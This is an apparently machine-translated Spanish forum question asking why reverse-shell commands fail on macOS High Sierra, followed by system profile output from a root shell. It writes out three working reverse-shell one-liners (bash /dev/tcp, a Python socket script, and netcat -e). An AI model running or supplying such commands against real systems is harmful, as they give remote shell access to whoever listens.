Estoy tratando de crear un reverse shell escucha con Alta Sierra, pero nada parece funcionar.
El comando bash algo simplemente se cuelga en el terminal y el tiempo de espera.
bash -i >& /dev/tcp/0.0.0.0/8080 0>&1
El comando python errores con "Conexión rechazada" cuando el uso de python o python v2.7.
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",8080));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
el comando netcat errores con "nc: no válida la opción -e"
nc -e /bin/bash 0.0.0.0 8080
He probado otras soluciones que he encontrado en línea, pero usted consigue la idea...
Es posible crear un reverse shell (de preferencia con acceso a bash) con Alta Sierra?
especificaciones:
sh-3.2# system_profiler SPSoftwareDataType
Software:
System Software Overview:
System Version: macOS 10.13.4 (17E199)
Kernel Version: Darwin 17.5.0
Boot Volume: lily
Boot Mode: Normal
Computer Name: lily's MacBook Air
User Name: System Administrator (root)
Secure Virtual Memory: Enabled
System Integrity Protection: Enabled
Time since boot: 2:03